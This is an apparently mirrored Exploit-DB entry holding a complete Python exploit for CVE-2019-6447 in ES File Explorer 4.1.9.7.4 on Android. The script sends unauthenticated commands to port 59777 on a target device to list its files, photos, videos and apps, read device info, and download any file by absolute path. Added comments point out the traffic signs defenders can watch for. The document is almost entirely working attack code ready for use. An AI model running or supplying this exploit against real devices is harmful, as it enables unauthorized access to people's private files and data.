ES File Explorer 4.1.9.7.4 – Arbitrary File Read

  • 作者: Nehal Zaman
    日期: 2021-06-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50070/
  • # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
    # Date: 29/06/2021
    # Exploit Author: Nehal Zaman
    # Version: ES File Explorer v4.1.9.7.4
    # Tested on: Android
    # CVE : CVE-2019-6447
    
    import requests
    import json
    import ast
    import sys
    
    # Two positional arguments are mandatory: the command name and the target IP.
    if len(sys.argv) < 3:
        print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
        sys.exit(1)

    # CVE-2019-6447: the application's HTTP service is addressed on TCP 59777
    # and this script sends it no credentials of any kind. For defenders, that
    # port being reachable on an Android device, and JSON bodies carrying a
    # "command" field sent to it, are the observable signs of this traffic.
    url = 'http://' + sys.argv[2] + ':59777'
    cmd = sys.argv[1]
    cmds = [
        'listFiles',
        'listPics',
        'listVideos',
        'listAudios',
        'listApps',
        'listAppsSystem',
        'listAppsPhone',
        'listAppsSdcard',
        'listAppsAll',
        'getFile',
        'getDeviceInfo',
    ]
    # The first nine entries are the listing commands; the remaining two
    # (getFile, getDeviceInfo) are handled separately further down.
    listCmds = cmds[:9]
    if cmd not in cmds:
        for help_line in (
            "[-] WRONG COMMAND!",
            "Available commands : ",
            "listFiles : List all Files.",
            "listPics: List all Pictures.",
            "listVideos: List all videos.",
            "listAudios: List all audios.",
            "listApps: List Applications installed.",
            "listAppsSystem: List System apps.",
            "listAppsPhone : List Communication related apps.",
            "listAppsSdcard: List apps on the SDCard.",
            "listAppsAll : List all Application.",
            "getFile : Download a file.",
            "getDeviceInfo : Get device info.",
        ):
            print(help_line)
        sys.exit(1)

    for banner_line in (
        "\n==================================================================",
        "|ES File Explorer Open Port Vulnerability : CVE-2019-6447|",
        "|Coded By : Nehal a.k.a PwnerSec |",
        "==================================================================\n",
    ):
        print(banner_line)

    # Every POST carries only this header; no authentication header is set.
    header = {"Content-Type" : "application/json"}
    # Local intercepting-proxy settings. Defined here but not passed to any
    # request call in this listing.
    proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
    
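    def httpPost(cmd):
        """Send one command to the target's HTTP service and return the decoded reply.

        The command name is wrapped as ``{"command": cmd}`` and POSTed to the
        module-level ``url`` using the module-level ``header``.

        Args:
            cmd: Command name, one of the entries in ``cmds``.

        Returns:
            The Python object obtained by evaluating the response body as a
            literal (the callers in this script expect a list or a dict).

        Raises:
            requests.exceptions.RequestException: the connection failed or
                timed out.
            ValueError, SyntaxError: the body is not a valid Python literal.
        """
        data = json.dumps({"command":cmd})
        # Bound the wait so an unreachable or silent host cannot hang the script.
        response = requests.post(url, headers=header, data=data, timeout=10)
        # NOTE(review): the body comes from a remote, untrusted device.
        # literal_eval only builds literals and does not execute code, but a
        # malformed or hostile reply still raises here. json.loads would be the
        # stricter parser if the service returns valid JSON; confirm that
        # before switching.
        return ast.literal_eval(response.text)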
    
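    def parse(text, keys):
        """Print the selected fields of every record, one ``key : value`` per line.

        A blank line is printed after each record. A field that a record does
        not contain is skipped rather than raising KeyError, so one incomplete
        record does not abort the rest of the listing.

        Args:
            text: Iterable of dict records (the decoded listing reply).
            keys: Field names to print, in the order they should appear.
        """
        for record in text:
            for field in keys:
                if field in record:
                    print(f"{field} : {record[field]}")
            # Blank separator line between records.
            print('')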
    
    def do_listing(cmd):
        """Run one listing command and print every record it returns.

        Args:
            cmd: One of the listing command names in ``listCmds``.
        """
        records = httpPost(cmd)
        # Field names are taken from the first record only; an empty reply
        # yields no fields and therefore prints nothing.
        fields = list(records[0].keys()) if len(records) != 0 else []
        parse(records, fields)
    
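    # Dispatch on the validated command name.
    if cmd in listCmds:
        do_listing(cmd)

    elif cmd == 'getFile':
        if len(sys.argv) != 4:
            print("[+] Include file name to download.")
            sys.exit(1)
        path = sys.argv[3]
        # startswith() also rejects an empty argument, which indexing the
        # first character would crash on.
        if not path.startswith('/'):
            print("[-] You need to provide full path of the file.")
            sys.exit(1)
        print("[+] Downloading file...")
        # The file is requested with a plain GET of the absolute path appended
        # to the service URL; on the wire this is what the file read in
        # CVE-2019-6447 looks like. The timeout keeps a silent host from
        # hanging the script.
        response = requests.get(url + path, timeout=10)
        # Do not save an error body and then report success.
        if not response.ok:
            print(f"[-] Download failed: HTTP {response.status_code}")
            sys.exit(1)
        # The output name is fixed, so an existing out.dat in the working
        # directory is overwritten.
        with open('out.dat','wb') as wf:
            wf.write(response.content)
        print("[+] Done. Saved as `out.dat`.")

    elif cmd == 'getDeviceInfo':
        # The reply is used as a single mapping, printed one field per line.
        response = httpPost(cmd)
        for key, value in response.items():
            print(f"{key} : {value}")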